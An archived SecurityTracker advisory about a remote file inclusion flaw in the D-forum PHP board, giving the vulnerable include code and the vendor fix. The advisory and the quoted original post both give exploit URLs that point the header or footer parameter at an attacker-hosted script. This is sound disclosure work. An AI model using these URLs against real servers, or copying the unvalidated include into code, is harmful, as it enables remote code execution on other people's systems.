SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   D-forum Vendors:   Fleire, Benoit
D-forum Include File Error Lets Remote Users Execute Arbitrary Commands on the Target Server
SecurityTracker Alert ID:  1006115
SecurityTracker URL:  http://securitytracker.com/id/1006115
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Feb 17 2003
Impact:   Execution of arbitrary code via network, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 1.00 - 1.11; version 1.11 before November 23, 2002
Description:   An include file vulnerability was reported in D-forum. A remote user can execute arbitrary operating system commands on the target server.

It is reported that the file 'header.php3' includes the $my_header variable and the file 'footer.php3' includes the $my_footer variable without validating that the proper file is included.

A remote user can create a specially crafted URL that specifies a remote location for either the $my_header or $my_footer variables. The URL will cause the remotely located PHP code referenced by the variable to be executed on the target server. Two demonstration exploit URLs are provided:

http://[target]/includes/footer.php3?my_footer=http://[attacker]/script.txt

http://[target]/includes/header.php3?my_header=http://[attacker]/script.txt

Impact:   A remote user can execute arbitrary PHP code, including operating system commands, on the target server.
Solution:   The vendor has released a fix, included in version 1.11 as of November 23, 2002. Older releases of version 1.11 may be vulnerable.

The fix is available at:

http://www.adalis.fr/dforum/nav.php?page=dforum_dl

Vendor URL:  www.adalis.fr/dforum/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [VulnWatch] D-Forum (PHP)



Informations :
Website : http://www.adalis.fr/adalis.html
Versions : 1.00 -> 1.11
Problem : Include file


PHP Code/Location :

/includes/header.php3 :
---------------------------
<?php
if ($my_header!="")
{
     include ($my_header);
} else {
     ?>
...
--------------------------


/includes/footer.php3 :
---------------------------
...
if ($my_footer!="")
{
     include ($my_footer);
} else {
?>
...
---------------------------



Exploits :
http://[target]/includes/footer.php3?my_footer=http://[attacker]/script.txt 
or 
http://[target]/includes/header.php3?my_header=http://[attacker]/script.txt 
with
http://[attacker]/script.txt


Patch :
A patch can be found on http://www.phpsecure.info .

More details :
(in French) http://www.frog-man.org/tutos/5holes8.txt




frog-m@n




_________________________________________________________________
MSN Messenger : discutez en direct avec vos amis !  
http://messenger.fr.msn.be



 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC